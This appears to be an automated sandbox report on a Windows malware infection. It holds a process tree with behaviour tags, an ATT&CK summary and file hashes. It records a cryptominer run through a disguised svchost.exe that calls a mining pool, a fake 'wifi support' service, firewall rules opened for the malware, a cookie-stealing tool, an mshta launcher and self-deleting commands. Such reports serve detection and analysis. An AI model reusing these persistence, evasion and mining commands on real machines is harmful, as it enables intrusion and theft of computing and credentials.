C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 34⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\Setup.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 33⤵
- Runs ping.exe
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8427784AA63B8C023F2FFA2751F176DB C2⤵
- Loads dropped DLL
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\A885.exeC:\Users\Admin\AppData\Local\Temp\A885.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\5df7de7b-36f7-4e29-b452-12327328f339" /deny *S-1-1-0:(OI)(CI)(DE,DC)2⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\A885.exe"C:\Users\Admin\AppData\Local\Temp\A885.exe" --Admin IsNotAutoStart IsNotTask2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\fd349998-2924-4e48-a905-c6e3caee1ad9\updatewin1.exe"C:\Users\Admin\AppData\Local\fd349998-2924-4e48-a905-c6e3caee1ad9\updatewin1.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\fd349998-2924-4e48-a905-c6e3caee1ad9\updatewin2.exe"C:\Users\Admin\AppData\Local\fd349998-2924-4e48-a905-c6e3caee1ad9\updatewin2.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\fd349998-2924-4e48-a905-c6e3caee1ad9\updatewin.exe"C:\Users\Admin\AppData\Local\fd349998-2924-4e48-a905-c6e3caee1ad9\updatewin.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\fd349998-2924-4e48-a905-c6e3caee1ad9\updatewin.exe4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 35⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\fd349998-2924-4e48-a905-c6e3caee1ad9\5.exe"C:\Users\Admin\AppData\Local\fd349998-2924-4e48-a905-c6e3caee1ad9\5.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 8564⤵
- Drops file in Windows directory
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 8404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 9804⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 10724⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 10844⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 11324⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 14124⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 14884⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 16724⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 16564⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 16444⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 16484⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\B874.exeC:\Users\Admin\AppData\Local\Temp\B874.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo dbvicTgbw2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Lana.vstx2⤵
-
C:\Windows\SysWOW64\cmd.execmd3⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^LclAMwrfJRiNjlhXSZlDfaVoPHKJbmmurUsqCCnZoBJcKzCAVHAPrJFaAwLysxRlswKsShcdBlcNJmnvylNPZKexfZmARaINKmtIIlHIjlhThRJqDgquGwlHZdeTNUnpBHrpcPNVCyDPvpu$" Venuto.wks4⤵
-
C:\Users\Admin\AppData\Local\Temp\iWITnJBnWfgAPAKrb\Benedetto.comBenedetto.com Amano.psd4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\iWITnJBnWfgAPAKrb\Benedetto.comC:\Users\Admin\AppData\Local\Temp\iWITnJBnWfgAPAKrb\Benedetto.com Amano.psd5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 304⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\C3D0.exeC:\Users\Admin\AppData\Local\Temp\C3D0.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\C3D0.exe"2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\CA59.exeC:\Users\Admin\AppData\Local\Temp\CA59.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\CEBF.exeC:\Users\Admin\AppData\Local\Temp\CEBF.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\rmfdqyol\2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\sjfmdcgk.exe" C:\Windows\SysWOW64\rmfdqyol\2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create rmfdqyol binPath= "C:\Windows\SysWOW64\rmfdqyol\sjfmdcgk.exe /d\"C:\Users\Admin\AppData\Local\Temp\CEBF.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description rmfdqyol "wifi internet conection"2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start rmfdqyol2⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\DB52.exeC:\Users\Admin\AppData\Local\Temp\DB52.exe1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\rmfdqyol\sjfmdcgk.exeC:\Windows\SysWOW64\rmfdqyol\sjfmdcgk.exe /d"C:\Users\Admin\AppData\Local\Temp\CEBF.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\svchost.exesvchost.exe -o msr.pool-pay.com:6199 -u 9jNvTpsSutBLodbiiRngN2S4AfM84WJ4Y8zRpo6H4QPBK625huByLqkiCTh5Uog1qHVBr7cyZfbA1GiiPqSsSv83HAiirSf.50000 -p x -k3⤵
-
C:\Users\Admin\AppData\Local\Temp\E1AC.exeC:\Users\Admin\AppData\Local\Temp\E1AC.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\E1AC.exeC:\Users\Admin\AppData\Local\Temp\E1AC.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\EB42.exeC:\Users\Admin\AppData\Local\Temp\EB42.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\F18D.exeC:\Users\Admin\AppData\Local\Temp\F18D.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\F873.exeC:\Users\Admin\AppData\Local\Temp\F873.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\F873.exe"C:\Users\Admin\AppData\Local\Temp\F873.exe"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /15-153⤵
-
C:\Users\Admin\AppData\Local\Temp\FC2E.exeC:\Users\Admin\AppData\Local\Temp\FC2E.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-LC42H.tmp\FC2E.tmp"C:\Users\Admin\AppData\Local\Temp\is-LC42H.tmp\FC2E.tmp" /SL5="$50268,300262,216576,C:\Users\Admin\AppData\Local\Temp\FC2E.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-QKT3U.tmp\ST.exe"C:\Users\Admin\AppData\Local\Temp\is-QKT3U.tmp\ST.exe" /S /UID=lab2123⤵
-
C:\Program Files\Windows Portable Devices\LKISPSEYLC\prolab.exe"C:\Program Files\Windows Portable Devices\LKISPSEYLC\prolab.exe" /VERYSILENT4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-C791G.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-C791G.tmp\prolab.tmp" /SL5="$30304,575243,216576,C:\Program Files\Windows Portable Devices\LKISPSEYLC\prolab.exe" /VERYSILENT5⤵
-
C:\Users\Admin\AppData\Local\Temp\8a-92b3f-8b7-5bea2-71493113fe3be\Fubelydizha.exe"C:\Users\Admin\AppData\Local\Temp\8a-92b3f-8b7-5bea2-71493113fe3be\Fubelydizha.exe"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\toybvyo3.3y2\joggaplayer.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\toybvyo3.3y2\joggaplayer.exeC:\Users\Admin\AppData\Local\Temp\toybvyo3.3y2\joggaplayer.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rmws2idu.2x2\download.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\rmws2idu.2x2\download.exeC:\Users\Admin\AppData\Local\Temp\rmws2idu.2x2\download.exe6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bkekc2sw.02b\proxybot.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\bkekc2sw.02b\proxybot.exeC:\Users\Admin\AppData\Local\Temp\bkekc2sw.02b\proxybot.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"7⤵
-
C:\Windows\regedit.exeregedit /s chrome.reg8⤵
- Runs .reg file with regedit
-
C:\Windows\SYSTEM32\TASKKILL.exeTASKKILL /F /IM chrome.exe8⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chrome64.bat8⤵
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\chrome64.bat" h"10⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe"11⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xdc,0xe0,0xe4,0xb0,0xe8,0x7ffb80396e00,0x7ffb80396e10,0x7ffb80396e2012⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1600,8858511011675211990,13845443645292924607,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1612 /prefetch:212⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1600,8858511011675211990,13845443645292924607,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2096 /prefetch:812⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1600,8858511011675211990,13845443645292924607,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1660 /prefetch:812⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,8858511011675211990,13845443645292924607,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2832 /prefetch:112⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,8858511011675211990,13845443645292924607,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2788 /prefetch:112⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,8858511011675211990,13845443645292924607,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:112⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,8858511011675211990,13845443645292924607,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3700 /prefetch:112⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,8858511011675211990,13845443645292924607,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:112⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,8858511011675211990,13845443645292924607,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:112⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,8858511011675211990,13845443645292924607,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4296 /prefetch:812⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,8858511011675211990,13845443645292924607,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4144 /prefetch:812⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1600,8858511011675211990,13845443645292924607,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4636 /prefetch:812⤵
-
C:\Windows\regedit.exeregedit /s chrome-set.reg8⤵
- Runs .reg file with regedit
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lvtur5xv.fek\MultitimerFour.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\lvtur5xv.fek\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\lvtur5xv.fek\MultitimerFour.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\CMZG4SAF44\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\CMZG4SAF44\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 1047⤵
-
C:\Users\Admin\AppData\Local\Temp\CMZG4SAF44\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\CMZG4SAF44\multitimer.exe" 1 3.1614578155.603c81ebdeb18 1048⤵
-
C:\Users\Admin\AppData\Local\Temp\CMZG4SAF44\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\CMZG4SAF44\multitimer.exe" 2 3.1614578155.603c81ebdeb189⤵
-
C:\Users\Admin\AppData\Local\Temp\48B.exeC:\Users\Admin\AppData\Local\Temp\48B.exe1⤵
- Executes dropped EXE
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
New Service
1Modify Existing Service
1Registry Run Keys / Startup Folder
2Bootkit
1Defense Evasion
Modify Registry
4File Permissions Modification
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\DTS\seed.sfx.exeMD5
65a25835b71f9a9ef7ae6aca50c2abf6
SHA105353307fbc4cbdc003ab65b2a39903b7dc37bba
SHA25644ef02c35a133047b2d4546dca717782cd30e3ab87a85c15fc771cfe5321c2e8
SHA5127509981a31248d78ef3d30d40cc9446fdba9eb8b087ec4335b43996520d052636203f59aa2e122adb2aabc2d9bfd9fba7c9926071d7fed0bf492ba2fe55c889d
-
C:\Program Files (x86)\DTS\seed.sfx.exeMD5
65a25835b71f9a9ef7ae6aca50c2abf6
SHA105353307fbc4cbdc003ab65b2a39903b7dc37bba
SHA25644ef02c35a133047b2d4546dca717782cd30e3ab87a85c15fc771cfe5321c2e8
SHA5127509981a31248d78ef3d30d40cc9446fdba9eb8b087ec4335b43996520d052636203f59aa2e122adb2aabc2d9bfd9fba7c9926071d7fed0bf492ba2fe55c889d
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exeMD5
07c850968d200387f7322ebf0e2c5c0e
SHA1c2a5561eb779feb799d090b1767039ea3abb0132
SHA2566f4e1c1e51480d65748535074667e26002b3ae8af8d290ec1b1684d3cb9a7df7
SHA5124d6421aaff5d5b5a3a23fe98f48936a7302f124fb944a8538ad0ba6f23b5b619fcae05c4ee08b8e6159a3f7465d5591c22813caa947a38bc928fa0875d9a8f50
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exeMD5
07c850968d200387f7322ebf0e2c5c0e
SHA1c2a5561eb779feb799d090b1767039ea3abb0132
SHA2566f4e1c1e51480d65748535074667e26002b3ae8af8d290ec1b1684d3cb9a7df7
SHA5124d6421aaff5d5b5a3a23fe98f48936a7302f124fb944a8538ad0ba6f23b5b619fcae05c4ee08b8e6159a3f7465d5591c22813caa947a38bc928fa0875d9a8f50
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850DMD5
f073769a76bbebbc11d5f8d086c5a899
SHA1edf9d9ec1f98f144062eb52ec0c875e4cfcbcda9
SHA256f20b6e890a150526e3574fc20d994737720b3a88dd6c3b146bfe8d0e4c5c167b
SHA51229b913f9689a307722e459d2c7078d5ea46b1c60f73a5c547f6a82004b1f15d008c471ceb272d9e350d559ee6af314b4bfc52bc334669f59727b97b84844c490
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711EMD5
c8f5dcc04731e23047a7e0609731c468
SHA15f4b7ec761c1d2f3a24417c06e20619216a9678e
SHA256de35f9bd437d0839a51b5c3cb5c4e2d6c6f586e703b99bfe63e60bea054b0a97
SHA5122ca4ab3cd0937f82d6e2eecbd9a21c4fc1a73ec1f19dcc8b635ad96b0cbf25383b3e2a552b9f20b59ef671af6c20f21bfcca99b48733f6bd3a9ebf140ac22caa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850DMD5
fa60657ffa02b5b7585d081cfd7bfde2
SHA15c60621783e06d4820e3dad7b9299331eb0c487d
SHA25661721431b3f25e1caa96ad896c2813354394ce98ebabd5b264881aefbe531861
SHA5125bb56718d5c4bd50cc37fdd43415d4621a529374835f9acf47eb495f2edd6801f16dac09fb6b097ab2ccc5b586bcf7e843ab4c88354d9714bcf3468ad23f8e52
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711EMD5
825a08e12d78ad7d7d266ca67a92f28f
SHA1681fb2e512ad1e41659a9b6ee289714763457f4a
SHA25604f85dc731048cf21c6741ec9bb828cf47f896e394e7210ff98f036dd41b51a0
SHA512347f997954d4452e1c821caa0f5fe40f62d337996cf11b5e6ff2e25859bcbddd0318f208aaae4f37e249bfb9222c6e3703df3d408930e1cdb2939c203e6cafde
-
C:\Users\Admin\AppData\Local\5df7de7b-36f7-4e29-b452-12327328f339\A885.exeMD5
526639f3fcf47eac850956ecae93b660
SHA13635069781ae0b8b834d3cf097753fd66934dda8
SHA2560a3af2144ec762b7233a92e20f753aca5a76219a14abc2a907516ad9d48dad71
SHA512c0e456e9ed005c386238916401b533113d087387f3f4f34a7eacc7e425ff9505f55ea1510fdf9e6d2423fa64bd96be7287e85805688f9214b6359a0e94c44525
-
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exeMD5
0feba769899648ba9f2cda02c6825df8
SHA141445a2fda85a9b6e6b4015c7a0ebec60f326b81
SHA256d74b612aa9f21f0d12bdb8a8e8af894bd718a1145c41ec64a646cf4fa78e9f75
SHA512f713dc13c18b2faebee2d777e32bb0c2a1075aee26509c500e6e001770717607591d7bef6f1acbba5d05ad26eb13421af25f968d4da5432c18b18c9f2a336843
-
C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exeMD5
d9c8f4d5e5def9b419ee958b95295d67
SHA1fe1e8744fac9c4ca1d6259b84bad88266e30d513
SHA25642b3ce7cea9258cab25a9d6107e164be0e2ca268fe16fd35737359313b58b01e
SHA5121cbdae7791e66e93fa2e961d8113d0e5aa06ef5001ba14573cfc51e4b72a206f9b24c02927e2bc8078e3e68adc682a642454d0585d56dbabe0a98b792c594e4b
-
C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exeMD5
d9c8f4d5e5def9b419ee958b95295d67
SHA1fe1e8744fac9c4ca1d6259b84bad88266e30d513
SHA25642b3ce7cea9258cab25a9d6107e164be0e2ca268fe16fd35737359313b58b01e
SHA5121cbdae7791e66e93fa2e961d8113d0e5aa06ef5001ba14573cfc51e4b72a206f9b24c02927e2bc8078e3e68adc682a642454d0585d56dbabe0a98b792c594e4b
-
C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exeMD5
d9c8f4d5e5def9b419ee958b95295d67
SHA1fe1e8744fac9c4ca1d6259b84bad88266e30d513
SHA25642b3ce7cea9258cab25a9d6107e164be0e2ca268fe16fd35737359313b58b01e
SHA5121cbdae7791e66e93fa2e961d8113d0e5aa06ef5001ba14573cfc51e4b72a206f9b24c02927e2bc8078e3e68adc682a642454d0585d56dbabe0a98b792c594e4b
-
C:\Users\Admin\AppData\Local\Temp\A885.exeMD5
526639f3fcf47eac850956ecae93b660
SHA13635069781ae0b8b834d3cf097753fd66934dda8
SHA2560a3af2144ec762b7233a92e20f753aca5a76219a14abc2a907516ad9d48dad71
SHA512c0e456e9ed005c386238916401b533113d087387f3f4f34a7eacc7e425ff9505f55ea1510fdf9e6d2423fa64bd96be7287e85805688f9214b6359a0e94c44525
-
C:\Users\Admin\AppData\Local\Temp\A885.exeMD5
526639f3fcf47eac850956ecae93b660
